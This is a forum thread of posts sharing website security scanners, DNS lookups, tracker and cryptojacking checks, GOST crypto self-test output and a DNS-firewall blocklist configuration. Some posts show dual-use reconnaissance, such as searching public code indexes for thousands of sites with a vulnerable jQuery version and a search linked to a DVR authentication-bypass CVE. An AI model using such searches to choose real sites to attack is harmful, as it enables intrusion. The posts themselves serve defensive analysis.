
Quote
h@8.8.4.4 (Default):
Usage:  dig [@global-server] [domain] [q-type] [q-class] {q-opt}
            {global-d-opt} host [@local-server] {local-d-opt}
            [ host [@local-server] {local-d-opt} [...]]
Where:  domain     is in the Domain Name System
        q-class  is one of (in,hs,ch,...) [default: in]
        q-type   is one of (a,any,mx,ns,soa,hinfo,axfr,txt,...) [default:a]
                 (Use ixfr=version for type ixfr)
        q-opt    is one of:
                 -x dot-notation     (shortcut for reverse lookups)
                 -i                  (use IP6.INT for IPv6 reverse lookups)
                 -f filename         (batch mode)
                 -b address[#port]   (bind to source address/port)
                 -p port             (specify port number)
                 -q name             (specify query name)
                 -t type             (specify query type)
                 -c class            (specify query class)
                 -k keyfile          (specify tsig key file)
                 -y [hmac:]name:key  (specify named base64 tsig key)
                 -4                  (use IPv4 query transport only)
                 -6                  (use IPv6 query transport only)
                 -m                  (enable memory usage debugging)
        d-opt    is of the form +keyword[=value], where keyword is:
                 +[no]vc             (TCP mode)
                 +[no]tcp            (TCP mode, alternate syntax)
                 +time=###           (Set query timeout) [5]
                 +tries=###          (Set number of UDP attempts) [3]
                 +retry=###          (Set number of UDP retries) [2]
                 +domain=###         (Set default domainname)
                 +bufsize=###        (Set EDNS0 Max UDP packet size)
                 +ndots=###          (Set NDOTS value)
                 +edns=###           (Set EDNS version)
                 +[no]search         (Set whether to use searchlist)
                 +[no]showsearch     (Search with intermediate results)
                 +[no]defname        (Ditto)
                 +[no]recurse        (Recursive mode)
                 +[no]ignore         (Don't revert to TCP for TC responses.)
                 +[no]fail           (Don't try next server on SERVFAIL)
                 +[no]besteffort     (Try to parse even illegal messages)
                 +[no]aaonly         (Set AA flag in query (+[no]aaflag))
                 +[no]adflag         (Set AD flag in query)
                 +[no]cdflag         (Set CD flag in query)
                 +[no]cl             (Control display of class in records)
                 +[no]cmd            (Control display of command line)
                 +[no]comments       (Control display of comment lines)
                 +[no]question       (Control display of question)
                 +[no]answer         (Control display of answer)
                 +[no]authority      (Control display of authority)
                 +[no]additional     (Control display of additional)
                 +[no]stats          (Control display of statistics)
                 +[no]short          (Disable everything except short
                                      form of answer)
                 +[no]ttlid          (Control display of ttls in records)
                 +[no]all            (Set or clear all display flags)
                 +[no]qr             (Print question before sending)
                 +[no]nssearch       (Search all authoritative nameservers)
                 +[no]identify       (ID responders in short answers)
                 +[no]trace          (Trace delegation down from root)
                 +[no]dnssec         (Request DNSSEC records)
                 +[no]nsid           (Request Name Server ID)
                 +[no]sigchase       (Chase DNSSEC signatures)
                 +trusted-key=####   (Trusted Key when chasing DNSSEC sigs)
                 +[no]topdown        (Do DNSSEC validation top down mode)
                 +[no]multiline      (Print records in an expanded format)
                 +[no]onesoa         (AXFR prints only one soa record)
        global d-opts and servers (before host name) affect all queries.
        local d-opts and servers (after host name) affect only that lookup.
        -h                           (print help and exit)
        -v                           (print version and exit)
Example output:
Quote
nimbus.bitdefender.net@8.8.4.4 (Default):
nimbus.bitdefender.net.   21599   IN   CNAME   elb-nvi-amz.nimbus.bitdefender.net.
elb-nvi-amz.nimbus.bitdefender.net. 21599 IN CNAME kube-nimbus-1671728955.us-east-1.elb.amazonaws.com.
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.204.39.25
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.203.98.12
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.203.77.162
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.205.81.93
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.45.231.34
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.45.221.142
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.44.27.79
kube-nimbus-1671728955.us-east-1.elb.amazonaws.com. 20 IN A 52.21.175.100

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2018, 08:56:44 PM
Just some further additional sources: https://www.crunchbase.com/organization/securolytics#section-overview

Scam scanning sites: http://www.scamfoo.com/  &   https://www.islegitsite.com/check

So many ways to establish what a website is all about without actually clicking that website link

polonus (volunteer website security analyzer and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on May 23, 2018, 11:05:21 PM
For developer's best practices and for debuggers alike, all your cheat sheets together online:

Re: http://overapi.com/                                       A pity you are not allowed to use it, when doing exams.

Also available as an extension: https://chrome.google.com/webstore/detail/all-cheat-sheets/oedodeocfdeegliepeeoieemhdgoijod

For those into websecurity and error-hunting: https://infosec.mozilla.org/guidelines/web_security.html

Enjoy, my good friends, enjoy,

polonus (volunteer website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on June 03, 2018, 07:26:17 PM
Net Neutrality Monitor - Monitor and analysis in real-time of the censorship systems used by Internet Service Providers.

Test your ISP for net neutrality: example: http://www.neumon.org/ip/206.165.6.11.html

polonus
Title: Re: Tests and other Media topics
Post by: REDACTED on June 09, 2018, 02:40:38 PM
HTTP Header check: https://hackertarget.com/http-header-check/
another way using their api: http://api.hackertarget.com/httpheaders/?q=http://www.google.com

See: https://adresults.nl/tools/header-checker/  &  https://headers.cloxy.net/
Re: http://www.internetmarketingninjas.com/header-checker/

Read: https://www.keycdn.com/blog/http-security-headers/  -> check: https://tools.keycdn.com/curl

polonus

Halo Polonus, I have tried link that you share here to check my http header https://smartdigital.id/jasa-seo/ but its show message "unable to connect to HTTP port" and still load more time process than webconfs that I usually use.
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2018, 01:39:51 PM
A nice website and  webserver scanner for a "quick and dirty"scan,
see results: https://www.htbridge.com/ -> https://www.htbridge.com/websec/

Can be combined with results of this scanner: https://sonarwhal.com/scanner/
and other specific scanners like for instance https://privacyscore.org/ &  https://urlscan.io/domain
Other aspects can be scanned as well, like jQuery library vulnerability at retire.insecurity.today/#
and dom based issues like sources and sinks via: http://www.domxssscanner.com/  (a Google provided service).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2018, 02:02:23 PM
This could also help you to find initializer errors in scripts like error: Undefined variable storage, where storage had be changed by ::Storage and then in the controller Storage.put_object_url(...)  to no longer get an error like
Quote
found JavaScript
     error: undefined function storage._each
     error: undefined variable storage
for ci.psdev.de/static/61489873/scripts/behavior.js  (info credits amonetti on Github's).

Other related scans: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fpsdev.de
re: https://urlscan.io/result/0f751ff0-71e9-4649-ab52-54e567d86693

All coming from the scan results at: https://www.htbridge.com/websec/ for related https://retire.insecurity.today/#!/scan/7149f4aa52e5c1e085e865b9b15c34cf6da783c323b3b17f1da65f9b9f4e7d50

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 26, 2018, 10:09:34 PM
EFF starts new project STARTTLS Everywhere to enhance e-mail security:
Example:
https://starttls-everywhere.org/results/?xs4all.nl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2018, 06:07:22 PM
L.S.

When the configuration of STARTTLS is OK, with the right policy list,
and all your hops secured, it is time for automatically enabling HTTPS on your website,
through the use of EEF's Certbot, go here: https://certbot.eff.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 04, 2018, 06:35:27 PM
Idiot proof implementation of HTTPS: https://httpsiseasy.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2018, 05:44:07 PM
Non-malicious site fails SSLScan. See: https://www.htbridge.com/ssl/?id=JcZI3CnC
Compare to: https://observatory.mozilla.org/analyze/www.overgang.no
Also consider: https://dnssec-analyzer.verisignlabs.com/www.overgang.no
Also see: https://sonarwhal.com/scanner/6b727529-dc3f-4687-9596-08107898f6a1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2018, 01:14:08 PM
Cryptojacking test for your browser: https://cryptojackingtest.com/

Cryptojacking test for your website: https://notmining.org/

Example of the second scanner for https://notmining.org/url?busqueda=http%3A%2F%2Fmejortorrent.com
Quote
Last update was on: Tue Jul 10 13:13:11 CEST 2018 . The result of this analyse was: Mining.
Detected: CoinHive.Anonymous (coinhive.com)

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2018, 03:46:46 PM
Online Interactive JavaScript Cheat Sheet for developer and debugger alike:
https://htmlcheatsheet.com/js/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2018, 12:45:48 PM
How are the results like in this Cryptojacking campaign report are being searched?

Example: https://pastebin.com/gYkbVP8b  (some blockers block this link, link for researchers only, temporalily unblock in this case).

This is the searchengine they use: https://publicwww.com

Consider this: https://publicwww.com/websites/cryptojacking+/

And one finds further insights like these: https://www.csoonline.com/search?query=cryptojacking+websites&contentType=article%2Cresource

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2018, 01:56:11 PM
Coming from here: https://www.htbridge.com/websec/?id=Cpy7Tv2c
We stumbled upon: -http://www.baberesto.com/jquery/jquery-1.8.3.min.js

Quote
Attackers often hide backdoors, crypto jacking malware and other malicious code inside of legitimate third-party JS (various libraries and frameworks). We check if a particular version of the third-party JS code was altered with a new code, and report any anomalies here.
The JS seems to match the original code.
The following JS component were found inside:- jQuery [1.8.3]
Then we scanned - https://retire.insecurity.today/#!/scan/641317ed91f88ae93e9067610c473dfcd9e2d68cf1aa721f4c47884ec7e9a1be

And then did a query with "" here: https://publicwww.com/websites/%22%2Fjquery%2Fjquery-1.8.3.min.js%22/
coming up with potentially 18774 websites in 5.14 s. with this medium secerity vulnerability:

Quote
Detected libraries:
jquery - 1.8.3 : (active1) hxtp://www.baberesto.com/jquery/jquery-1.8.3.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://github.com/jquery/jquery/issues/2432
http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/
http://research.insecurelabs.org/jquery/test/
Info: Severity: medium
https://bugs.jquery.com/ticket/11974
http://research.insecurelabs.org/jquery/test/
(active) - the library was also found to be active by running code
1 vulnerable library detected

error(s) inside this javascript code:
Quote
wXw.baberesto.com/jquery/jquery-1.8.3.min.js
     status: (referer=http:/XXX/web?q=puppies)saved 93636 bytes 06e872300088b9ba8a08427d28ed0efcdf9c6ff5
     info: ActiveXDataObjectsMDAC detected Microsoft.XMLHTTP
     info: [decodingLevel=0] found JavaScript
     error: undefined function p.getElementsByTagName
     error: undefined variable p
     info: [element] URL=wXw.baberesto.com/jquery/undefined
     info: [1] no JavaScript
     file: 06e872300088b9ba8a08427d28ed0efcdf9c6ff5: 93636 bytes
     file: d5dba94a76a67a54f2b98b16227da20414542fd9: 72 bytes
-> leading to wXw.baberesto.com/jquery/undefined

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2018, 05:47:20 PM
An iOT Cyber Space search-engine to use next to shodan: https://www.zoomeye.org/searchResult?q=%2Fjquery-1.9.1.min.js

Read: https://twitter.com/ankit_anubhav/status/1017426076467855360 because of
https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117


polonus

Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 12:18:03 AM
Testing websites for tracking.

Check websites for tracking here (example): https://whotracks.me/trackers/snigelweb.html

and compare with a scan at (same example): https://privacyscore.org/site/111090/
ANALYZED URL AFTER LOADING:
-http://www.snigelweb.com/   site is using 17 known tracking- or advertising companies.
Vulnerable to the SWEET32 attack.

ANALYZED MAIL SERVER:
-aspmx.l.google.com


polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 12:40:51 PM
Tracking is hot and there is almost no avoiding it. So you'd better know who's tracking you out of your sock(et)s  ;)

See this one, a site that I would block for malicious ad-redirecting.

Explore the data on this page: https://whotracks.me/websites/bulbagarden.net.html

Now compare with this Tracker Tracker report :
Quote
host   distinct names   name frequencies
-https://sb.scorecardresearch.com/beacon.js   1   ScoreCard Research Beacon (1)
1   ADTECH (1)
-https://bulbapedia.bulbagarden.net   8   OpenX (1) DoubleClick (3) ScoreCard Research Beacon (1) Google Tag Manager (1) Google Analytics (2) Twitter Button (1) ZergNet (1) Econda (1)
-https://Q1MediaHydraPlatform·com/ads/video/controller·php?qid=57d6d4bcdbcb6cda37200d1d&qz=1   1   (1)
-https://forums.bulbagarden.net/js/apantic/profilepostlimit/profile_post_limit.min.js?_v=3b17caa1   1   (1)

We tracked using these URLs
Quote
-https://Q1MediaHydraPlatform·com/ads/video/controller·php?qid=57d6d4bcdbcb6cda37200d1d&qz=1
-https://sb.scorecardresearch.com/beacon.js
-http://adserver.adtechus.com/addyn/3.0/5259.1/2787268/0/277/ADTECH;apid=1A8b2d8494-89ab-11e8-b592-d89d671a1f74;cfp=1;rndc=1531823050;loc=100;target=_blank;key=key1+key2+key3+key4;grp=405;misc=1531823049959
-https://bulbapedia.bulbagarden.net
-https://forums.bulbagarden.net/js/apantic/profilepostlimit/profile_post_limit.min.js?_v=3b17caa1

But there are more links: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=bulbagarden.net&ref_sel=GSP2&ua_sel=ff&fs=1

No specifics alerted here: http://isithacked.com/check/http%3A%2F%2Fbulbagarden.net%2F

polonus



Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 04:02:36 PM
Results may differ 17 trackers in one report, 18 trackers found up in the second:
https://whotracks.me/websites/tripadvisor.de.html   versus    https://privacyscore.org/site/42802/

Also see here: https://trackography.org/
For instance data in the Netherlands go to com.score public TV -> -b.scorecardresearch.com (from nos.nl)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 17, 2018, 09:05:41 PM
Nice Google JavaScript online compiler service:
https://closure-compiler.appspot.com/home

Repository of such tools: https://mvnrepository.com/artifact/com.google.javascript/closure-compiler

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2018, 12:02:25 PM
Is your website ready for the latest technology or rather ready for the "Hall of Shame"?

Checking a Hall of Shame site.

New checksite: https://en.internet.nl/site/phenoelit.org/338066/

Compare with existing website testing sites, like:
https://securityheaders.com/?q=http%3A%2F%2Fphenoelit.org%2F
and https://www.htbridge.com/websec/?id=DnFHnhuc
and https://observatory.mozilla.org/analyze/phenoelit.org

Enjoy, my good friends, enjoy,

polonus (volunteer third party cold reconnaissance website security analyst and website error-hunter)

P.S. I do not advise regular users go here: -http://seurat.0xffffffff.net/  (developer and network hacking)
but with the right mind-set  and being into security, one could learn a lot about insecurity of protocols
(white hat relevant knowledge, ignore the other darker material out there)

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 19, 2018, 06:16:37 PM
Are you or your devices not on Shodan?

Scan for it here: https://iotscanner.bullguard.com/

Enjoy, I was not on Shodan and secure via the deepscan results. How about you?
Title: Re: Tests and other Media topics
Post by: polonus on July 23, 2018, 11:59:13 AM
Testing with a JavaScript Tester online /*! JsRender v1.0.0-beta: http://github.com/BorisMoore/jsrender and http://jsviews.com/jsviews
informal pre V1.0 commit counter: 63 */
Possible strict violation - Assignment in conditional expression - Confusing use of '!' - 't' is already defined - A constructor name should start with an uppercase lletter - 'g' is already defined - 'd' is already defined - The function constructor is a form of eval - use '!==' to compare with "null'.

Unpacker does not find errors
Quote
nothing detected] script
     info: [decodingLevel=0] found JavaScript
     file: d3d7bb9a49ca44016a34a26956f1bfeacc4de695: 16068 bytes

Read here in this respect: http://mahalingamganesan.weebly.com/security.html
Re: http://www.webtoolkitonline.com/javascript-tester.html  Test in http://jsbin.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2018, 12:40:17 AM
Check your secure connection DNSSEC & DS algorithm
at https://rootcanary.org/test.html

enjoy my good friends, enjoy

polonus

Somehow GOST WebCrypto is not validated by my resolver(s) - Pure Javascript implementation of WebCrypto API interfaces and Public Key Infrastructure for GOST algorithms (Russian Cryptographic Standards) - read: https://github.com/rudonick/crypto
Demo: http://gostcrypto.com/

When trying to test GOST I was held back by a MalwareBytes Browser Extension Beta alert: Website blocked due
to possible suspicious activity

We strongly recommend you do not visit this site.

Website blocked: htXp://gostcrypto.com/self-tests.html

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 02, 2018, 01:07:36 AM
Tested it in a decentralized browser, Beaker browser beta, then it worked as a charm, results below:

Quote
GOST R 34.11-94 TEST

Test 01 GOST R 34.11-94-256 ........................................ PASSED 0.024 sec
Test 02 GOST R 34.11-94-256 ........................................ PASSED 0.007 sec
Test 03 GOST R 34.11-94-256 ........................................ PASSED 0.018 sec
Test 04 GOST R 34.11-94-256 ........................................ PASSED 0.032 sec
 
Test 05 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.003 sec
Test 06 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.002 sec
Test 07 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.002 sec
Test 08 GOST R 34.11-94-256/D-TEST ................................. PASSED 0.003 sec
 
PBKDF2 tests
Test 09 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 0.069 sec
Test 10 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 0.026 sec
Test 11 GOST R 34.11-94-256-PBKDF2 ................................. PASSED 1.527 sec
 
TOTAL OK
 
GOST R 34.11-2012 TEST

Test 01 GOST R 34.10-12-256 ........................................ PASSED 0.01 sec
Test 02 GOST R 34.10-12-256 ........................................ PASSED 0.026 sec
Test 03 GOST R 34.10-12-256 ........................................ PASSED 0 sec
Test 04 GOST R 34.10-12-256 ........................................ PASSED 0 sec
 
Test 05 GOST R 34.11-12-256-KDF .................................... PASSED 0.013 sec
Test 06 GOST R 34.11-12-256-KDF .................................... PASSED 0.005 sec
 
HMAC/PBKDF2 tests
Test 07 GOST R 34.11-12-256-HMAC ................................... PASSED 0.001 sec
Test 08 GOST R 34.11-12-512-HMAC ................................... PASSED 0.001 sec
Test 09 GOST R 34.11-12-256-PBKDF2 ................................. PASSED 0.476 sec
Test 10 GOST R 34.11-12-512-PBKDF2/VN .............................. PASSED 0.029 sec
Test 11 GOST R 34.11-12-512-PBKDF2/VN .............................. PASSED 0.026 sec
 
Test 12 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 13 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 14 GOST R 34.11-12-512 ........................................ PASSED 0 sec
Test 15 GOST R 34.11-12-512 ........................................ PASSED 0.004 sec
 
TOTAL OK
 
SHA-1 TEST

Test 01 SHA-1 ...................................................... PASSED 0.007 sec
Test 02 SHA-1 ...................................................... PASSED 0.001 sec
Test 03 SHA-1 ...................................................... PASSED 0.008 sec
 
PBKDF2 tests
Test 04 SHA-1-PBKDF2 ............................................... PASSED 0.001 sec
Test 05 SHA-1-PBKDF2 ............................................... PASSED 0.004 sec
Test 06 SHA-1-PFXKDF ............................................... PASSED 0.004 sec
Test 07 SHA-1-PFXKDF ............................................... PASSED 0.029 sec
Test 08 SHA-1-PFXKDF ............................................... PASSED 0.003 sec
Test 09 SHA-1-PFXKDF ............................................... PASSED 0.106 sec
 
TOTAL OK
 
GOST R 34.10-94 TEST

Test 01 GOST R 34.10-94-256/S-TEST ................................. PASSED Sign 0.072 sec, Verify 0.036 sec
 
TOTAL OK
 
GOST R 34.10-2012 TEST

Test 01 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.237 sec, Verify 0.118 sec
Test 02 GOST R 34.10-12-256/T-512-TEST ............................. PASSED Sign 0.566 sec, Verify 0.408 sec
Test 03 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.056 sec, Verify 0.141 sec
Test 04 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.035 sec, Verify 0.063 sec
Test 05 GOST R 34.10-12-256/S-256-TEST ............................. PASSED Sign 0.079 sec, Verify 0.279 sec
Test 06 GOST R 34.10-12-256/T-512-TEST ............................. PASSED Sign 0.235 sec, Verify 0.297 sec
 
Key exchange scenario
Test 07 GOST R 34.10-12-256-DH/S-256-TEST .......................... PASSED DeriveKey 0.067 sec
Test 08 GOST R 34.10-12-256-DH/X-256-A ............................. PASSED DeriveKey 0.05 sec
Test 09 GOST R 34.10-12-256-DH/X-256-A ............................. PASSED DeriveKey 0.047 sec
 
TOTAL OK
 
GOST 28147-89/GOST R 34.12-2015 TEST

Test 01 GOST 28147-ECB/D-TEST ...................................... PASSED
Test 02 GOST 28147-CBC/D-TEST ...................................... PASSED
Test 03 GOST 28147-CTR/D-TEST ...................................... PASSED
Test 04 GOST 28147-CFB/D-TEST ...................................... PASSED
Test 05 GOST 28147-ECB/D-TEST ...................................... PASSED
Test 06 GOST 28147-CFB/D-TEST ...................................... PASSED
Test 07 GOST 28147-CFB/E-TEST ...................................... PASSED
Test 08 GOST 28147-CFB/E-A ......................................... PASSED
Test 09 GOST 28147-CFB-8/E-B ....................................... PASSED
Test 10 GOST 28147-CFB-8/E-C ....................................... PASSED
Test 11 GOST 28147-CFB-8/E-D ....................................... PASSED
Test 12 GOST 28147-CFB-8/D-A ....................................... PASSED
Test 13 GOST 28147-CFB-8 ........................................... PASSED
Test 14 GOST 28147-CTR/E-A ......................................... PASSED
Test 15 GOST 28147-ECB/E-Z ......................................... PASSED
 
MAC sing/verify
Test 16 GOST 28147-MAC-32/E-A ...................................... PASSED
Test 17 GOST 28147-MAC-32/E-A ...................................... PASSED
 
Padding
Test 18 GOST 28147-ECB-BITPADDING/D-TEST ........................... PASSED
Test 19 GOST 28147-ECB-BITPADDING/D-TEST ........................... PASSED
Test 20 GOST 28147-ECB-PKCS5PPADDING/D-TEST ........................ PASSED
Test 21 GOST 28147-ECB-PKCS5PPADDING/D-TEST ........................ PASSED
Test 22 GOST 28147-ECB-ZEROPADDING/D-TEST .......................... PASSED
 
Key meshing
Test 23 GOST 28147-CFB-CPKEYMESHING/E-A ............................ PASSED
Test 24 GOST 28147-CBC-CPKEYMESHING/E-A ............................ PASSED
Test 25 GOST 28147-CTR-CPKEYMESHING/E-A ............................ PASSED
Test 26 GOST 28147-MAC-32/E-A ...................................... PASSED
 
Key wrapping
Test 27 GOST 28147-KW/D-TEST ....................................... PASSED
Test 28 GOST 28147-KW/E-A .......................................... PASSED
Test 29 GOST 28147-CPKW/D-TEST ..................................... PASSED
Test 30 GOST 28147-CPKW/E-A ........................................ PASSED
Test 31 GOST 28147-SCKW/E-SC ....................................... PASSED
 
GOST R 34.12-2015/64bits
Test 32 GOST R 34.12-15-ECB ........................................ PASSED
Test 33 GOST R 34.12-15-ECB ........................................ PASSED
Test 34 GOST R 34.12-15-CTR ........................................ PASSED
Test 35 GOST R 34.12-15-CBC ........................................ PASSED
Test 36 GOST R 34.12-15-CFB ........................................ PASSED
Test 37 GOST R 34.12-15-OFB ........................................ PASSED
Test 38 GOST R 34.12-15-MAC-32 ..................................... PASSED
 
GOST R 34.12-2015/128bits
Test 39 GOST R 34.12-15-128-ECB .................................... PASSED
Test 40 GOST R 34.12-15-128-ECB .................................... PASSED
Test 41 GOST R 34.12-15-128-CTR .................................... PASSED
Test 42 GOST R 34.12-15-128-OFB .................................... PASSED
Test 43 GOST R 34.12-15-128-CBC .................................... PASSED
Test 44 GOST R 34.12-15-128-CFB .................................... PASSED
Test 45 GOST R 34.12-15-128-MAC-64 ................................. PASSED
 
RC2
Test 46 RC2-63-ECB ................................................. PASSED
Test 47 RC2-ECB .................................................... PASSED
Test 48 RC2-ECB .................................................... PASSED
Test 49 RC2-ECB .................................................... PASSED
Test 50 RC2-ECB .................................................... PASSED
Test 51 RC2-ECB .................................................... PASSED
Test 52 RC2-128-ECB ................................................ PASSED
Test 53 RC2-129-ECB ................................................ PASSED
 
TOTAL OK

Do not understand why it does not work in the main line of browsers, should work in Yandex browser,
but did not test it there. Also do not understand the over-reactive security alert from MalwareBytes extension  ???


polonus (volunteer 3rd party website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2018, 12:41:40 PM
Nice collection of various blocklists, all incorporated in the code of this dns-fw:
https://github.com/cbuijs/unbound-dns-firewall/blob/master/dns-firewall.lists

Some you could add to your blocker of sorts.
Quote
////
Default-Regex-Black   black   /etc/unbound/regex-blacklist
Default-Regex-White   white   /etc/unbound/regex-whitelist

##Disconnect-Ads   black   https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt   /etc/unbound/disconnect-ads.list   86400   @DOMAIN
##Disconnect-Malware   black   https://s3.amazonaws.com/lists.disconnect.me/simple_malware.txt   /etc/unbound/disconnect-malware.list   86400   @DOMAIN
##Disconnect-Tracking   black   https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt   /etc/unbound/disconnect-tracking.list   86400   @DOMAIN
##Disconnect-Malvertising   black   https://s3.amazonaws.com/lists.disconnect.me/simple_malvertising.txt   /etc/unbound/disconnect-malvertising.list   86400   @DOMAIN

#Adguard-Android   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/android.txt   /etc/unbound/adguard-android.list   86400   @DOMAIN
#Adguard-Banks   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/banks.txt   /etc/unbound/adguard-banks.list   86400   @DOMAIN
#Adguard-FireFox   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/firefox.txt   /etc/unbound/adguard-firefox.list   86400   @DOMAIN
#Adguard-Issues   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/issues.txt   /etc/unbound/adguard-issues.list   86400   @DOMAIN
#Adguard-Sensistive   white   https://raw.githubusercontent.com/AdguardTeam/HttpsExclusions/master/sensitive.txt   /etc/unbound/adguard-sensitive.list   86400   @DOMAIN

EasyList   black   https://easylist.to/easylist/easylist.txt   /etc/unbound/easylist.list   86400   @ADBLOCK-BLACK
EasyList-Element   black   /etc/unbound/easylist.list.download   /etc/unbound/easylist-element.list   86400   @ADBLOCK-ELEMENT
EasyList-White   white   /etc/unbound/easylist.list.download   /etc/unbound/easylist-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyPrivacy   black   https://easylist.to/easylist/easyprivacy.txt   /etc/unbound/easyprivacy.list   86400   @ADBLOCK-BLACK
EasyPrivacy-Element   black   /etc/unbound/easyprivacy.list.download   /etc/unbound/easyprivacy-element.list   86400   @ADBLOCK-ELEMENT
EasyPrivacy-White   white   /etc/unbound/easyprivacy.list.download   /etc/unbound/easyprivacy-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyList-Dutch   black   https://easylist-downloads.adblockplus.org/easylistdutch.txt   /etc/unbound/easylist-dutch.list   86400   @ADBLOCK-BLACK
EasyList-Dutch-Element   black   /etc/unbound/easylist-dutch.list.download   /etc/unbound/easylist-dutch-element.list   86400   @ADBLOCK-ELEMENT
EasyList-Dutch-White   white   /etc/unbound/easylist-dutch.list.download   /etc/unbound/easylist-dutch-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
EasyList-French   black   https://easylist-downloads.adblockplus.org/liste_fr.txt   /etc/unbound/easylist-french.list   86400   @ADBLOCK-BLACK
EasyList-French-Element   black   /etc/unbound/easylist-french.list.download   /etc/unbound/easylist-french-element.list   86400   @ADBLOCK-ELEMENT
EasyList-French-White   white   /etc/unbound/easylist-french.list.download   /etc/unbound/easylist-french-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE

#FanBoy-Complete   black   https://fanboy.co.nz/r/fanboy-complete.txt   /etc/unbound/fanboy.list   86400   @ADBLOCK-BLACK
#FanBoy-Complete-White   white   /etc/unbound/fanboy.list.download   /etc/unbound/fanboy-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE

#PipeRun   black   https://raw.githubusercontent.com/piperun/iploggerfilter/master/filterlist   /etc/unbound/piperun.list   86400   @ADBLOCK-BLACK

#PopAds   black   https://raw.githubusercontent.com/Yhonay/antipopads/master/popads.txt   /etc/unbound/popads.list   86400   @ADBLOCK-BLACK

#Anudeep   white   https://raw.githubusercontent.com/anudeepND/whitelist/master/whitelist.txt   /etc/unbound/anudeep.list   86400   @DOMAIN
#Anudeep-YouTube-Ads   black   https://raw.githubusercontent.com/anudeepND/youtubeadsblacklist/master/domainlist.txt   /etc/unbound/anudeep-youtube-ads.list   86400   @DOMAIN

#BarbBlock   black   https://ssl.bblck.me/blacklists/domain-list.txt   /etc/unbound/barbblock.list   86400   @DOMAIN

##Adguard-Cryptominers   black   https://raw.githubusercontent.com/AdguardTeam/AdguardFilters/master/EnglishFilter/sections/cryptominers.txt   /etc/unbound/adguard-cryptominers.list   86400   @ADBLOCK-BLACK
##CoinBlocker   black   https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/list.txt   /etc/unbound/coinblocker.list   86400   @DOMAIN
##CoinBlocker-IP   black   https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/MiningServerIPList.txt   /etc/unbound/coinblocker-ip.list   86400   @IP
##NoCoin   black   https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/hosts.txt   /etc/unbound/nocoin.list   86400   @HOST0

##Dshield-Top10   black   http://feeds.dshield.org/top10-2.txt   /etc/unbound/dshield-top10.list   86400   @HOST   ^site$
##Dshield-Suspicious   black   https://www.dshield.org/feeds/suspiciousdomains_High.txt   /etc/unbound/dshield-suspicious.list   86400   @DOMAIN   ^site$
#Dshield-Whitelist   white   https://dshield.org/feeds/suspiciousdomains_whitelist_approved.txt   /etc/unbound/dshield-white.list   86400   @DOMAIN   ^site$

